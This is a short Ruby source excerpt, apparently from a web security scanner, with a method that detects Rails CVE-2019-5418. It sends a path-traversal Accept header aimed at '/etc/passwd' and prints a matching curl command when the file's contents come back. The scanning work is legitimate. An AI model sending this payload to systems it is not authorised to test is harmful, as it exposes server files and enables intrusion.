13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
# File 'lib/scanner/plugins/applications/framework/rails.rb', line 13
def self.check_cve_2019_5418(links)
Yawast::Shared::Output.log_hash 'vulnerabilities',
'rails_cve_2019_5418',
{vulnerable: false, body: nil}
links.each do |link|
next unless link.to_s.end_with? '/'
body = Yawast::Shared::Http.get(URI.parse(link), {'Accept' => '../../../../../../../../../etc/passwd{{'})
if body.include? 'root:'
Yawast::Utilities.puts_vuln 'Rails CVE-2019-5418: File Content Disclosure'
Yawast::Utilities.puts_raw "\tcurl -H 'Accept: ../../../../../../../../../etc/passwd{{' #{link}"
Yawast::Shared::Output.log_hash 'vulnerabilities',
'rails_cve_2019_5418',
{vulnerable: true, body: body, uri: link}
break
end
end
end
|